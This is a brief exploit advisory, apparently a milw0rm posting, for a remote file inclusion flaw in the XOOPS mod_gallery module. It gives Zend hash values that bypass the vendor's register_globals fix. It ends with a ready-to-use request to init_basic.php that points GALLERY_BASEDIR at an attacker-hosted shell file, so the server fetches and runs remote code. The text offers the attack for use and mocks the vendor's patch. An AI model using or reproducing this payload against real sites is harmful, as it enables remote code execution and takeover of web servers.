----[ XOOPS mod_gallery Zend_Hash_key + Extract RFI ... ITDefence.ru Antichat.ru ] XOOPS mod_gallery Zend_Hash_key + Extract REMOTE FILE INCLUDE Eugene Minaev underwater@itdefence.ru ___________________________________________________________________ ____/ __ __ _______________________ _______ _______________ \ \ \ / .\ / /_// // / \ \/ __ \ /__/ / / / /_// /\ / / / / /___/ \/ / / / / /\ / / / / / \/ / / / / /__ //\ \ / ____________/ / \/ __________// /__ // / /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ \ \\ // // / .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . . \_\\________[________________________________________]_________//_//_/ . . Bug works only with register_globals = OFF . I find their security fix very fun , and you ? : ) Hah .. very serious security fix , yeah :) zend_hash_key_calc.exe GALLERY_BASEDIR GALLERY_BASEDIR PHP5 hash: -2093085906 PHP4 hash: -995617320 test.ru/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://path/to/m0nzt3r_shell.txt?&2093085906=1&995617320=2 ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] # milw0rm.com [2008-01-06]